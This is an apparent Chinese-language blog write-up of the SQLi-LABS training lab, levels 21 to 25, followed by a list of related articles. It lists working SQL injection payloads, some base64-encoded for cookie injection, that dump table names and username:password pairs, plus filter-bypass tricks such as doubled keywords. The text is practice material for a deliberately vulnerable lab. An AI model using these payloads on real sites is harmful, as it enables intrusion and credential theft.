SQLi-LABS的Less21-30分析_less-21 coolie注入

简介: SQLi-LABS的Less21-30分析_less-21 coolie注入

抓包的cookie解码,不过不太对

那么“%3D” 是 URL 编码中的等号,所以将YWRtaWRta4=破译(decode),对这base64解码

那我们注入的时候八码编码为base64就好,试一下看看怎么样,得到了注入点为’)

Cookie: uname=admin’)#
Cookie: uname=YWRtaW4nKSM=
Cookie: uname=1’) UNION SELECT 1,2,3#
Cookie: uname=MScpIFVOSU9OIFNFTEVDVCAxLDIsMyM=
Cookie: uname=1’) UNION SELECT 1,2,database()#
Cookie: uname=MScpIFVOSU9OIFNFTEVDVCAxLDIsZGF0YWJhc2UoKSM=
接下来要换成updatexml语句了,不然会报错
Cookie: uname=1’) UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = ‘security’#
Cookie:uname=MScpIFVOSU9OIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIEZST00gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyBXSEVSRSB0YWJsZV9zY2hlbWEgPSAnc2VjdXJpdHknIw==
Cookie: uname=1’) UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_schema = ‘security’ AND table_name = ‘users’#
Cookie: uname=MScpIFVOSU9OIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBGUk9NIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIFdIRVJFIHRhYmxlX3NjaGVtYSA9ICdzZWN1cml0eScgQU5EIHRhYmxlX25hbWUgPSAndXNlcnMnIw==
Cookie: uname=1’) UNION SELECT 1,2,group_concat(concat(“:”,username,password)) FROM security.users#
Cookie: uname=MScpIFVOSU9OIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KGNvbmNhdCgiOiIsdXNlcm5hbWUscGFzc3dvcmQpKSBGUk9NIHNlY3VyaXR5LnVzZXJzIw==
Less22
总的来说与Less21基本一样,不过注入点为双引号"
Less23
输入?id=1正常显示,输入?id=1‘或者?id=1’)或者?id=1’))报错,加入注释符–+或者#还报错,那么推测也许将注释符号过滤了,那么尝试//‘?id=1’(这语句结束后带个’来与括号后的’闭合从而结束语句)‘,那么尝试下万能语句看看?id=1’ or 1=1 or’显示正常了,?id=1’) or 1=1 or’或者?id=1’)) or 1=1 or’报错,那么注入点为’输入语句
?id=-1’ UNION SELECT 1,2,3 ’
爆库
?id=-1’ UNION SELECT 1,2,database() ’
爆表名
?id=-1’ UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema=‘security’ ’
爆字段吧
?id=-1’ union select 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_schema=‘security’ and table_name=‘users’ ’
爆数据的时候报错了
?id=-1’ UNION SELECT 1,2,group_concat(concat_ws(‘:’,username,password)) FROM users’
那么也许格式语法问题,不过用个where语句试试看
?id=-1’ UNION SELECT 1,2,group_concat(concat_ws(‘:’,username,password)) FROM users where ‘1’='1
这语句成功通过
Less24
在登陆界面注入登录失败了,那么输入admin看看会发生什么显示你可改密码,返回页面点new users click here设置新用户admin’看看然后返回主页面登录成功
Less25
明显的提示all your ‘or’ and ‘and’ belong to us
照例先输入?id=1或者?id=1’或者?id=1’)或者?id=1"或者?id=1")
那么输入?id=1’或者?id=1’)报错了
加上注释符f分别输入?id=1’–+跟?id=1’)–+
那么?id=1’–+没报错,猜测注入点为’
根据提示your ‘or’ belong to us那么用or构造个万能语句看看输入?id=1’ or 1=1–+
显示为报错
那么怎么使用or不报错了
试试在语句or插入一个or语句,如果中间or被过滤掉了剩余部分构成or就成功了
判断列数
?id=1’ oorrder by 4–+
使用union语句
?id=-1’ UNION SELECT 1,2,3–+
爆库
?id=-1’ UNION SELECT 1,2,database()–+
爆表名
?id=-1’ UNION SELECT 1,2,group_concat(table_name) FROM infoorrmation_schema.tables WHERE table_schema = ‘security’–+
爆字段名


相关文章
|
5月前
|
SQL 数据库
【SQL注入】 sqli-labs靶场 sqlmap注入
SQL注入 sqli-labs靶场 sqlmap注入
65 0
|
5月前
|
数据安全/隐私保护
【less-3】sqli-labs靶场第三关
【less-3】sqli-labs靶场第三关
|
6月前
|
SQL 安全
9、sqli-labs(报错注入1-4)
9、sqli-labs(报错注入1-4)
28 1
|
6月前
|
PHP
8、sqli-labs环境
8、sqli-labs环境
38 1
|
6月前
|
SQL 数据库
10、sqli-labs(盲注8-10)
10、sqli-labs(盲注8-10)
33 1
|
SQL 数据库
SQLi LABS Less-26a
第26a关使用GET请求传递参数,在url地址栏中构造payload即可 源码中过滤了参数中的or,and,/*,--,#,空格,斜线,我们想办法绕过即可
319 0
SQLi LABS Less-26a
SQLi LABS Less-25a
第25a关使用GET请求传递参数,在url地址栏中构造payload即可 后端源码中过滤了and和or,但只过滤了一次,我们可以通过双写绕过
221 0
SQLi LABS Less-25a
|
SQL 数据库 数据安全/隐私保护
SQLi LABS Less-16
第16关使用POST请求提交参数,可以使用代理工具抓包或直接在输入框中修改参数 后端代码根据用户输入账号和密码去数据库中查询,查询成功则返回登录成功,否则返回登录失败,页面没有显示的数据,SQL语句中使用了错误抑制符@来限制数据库的报错信息,因此不能使用联合注入或报错注入,推荐使用布尔盲注,源码如下
145 0
SQLi LABS Less-16
SQLi LABS Less-23
第23关使用GET请求传递参数,在url地址栏构造payload即可 此关卡对注释符号进行了过滤,因此不能使用注释符,可以使用单引号闭合,使SQL的语法结构成立
148 0
SQLi LABS Less-23
SQLi LABS Less-30
第30关使用GET请求传递参数,在url中构造payload即可 后端源码中并没有做什么过滤,只是在参数两边添加了双引号
138 0
SQLi LABS Less-30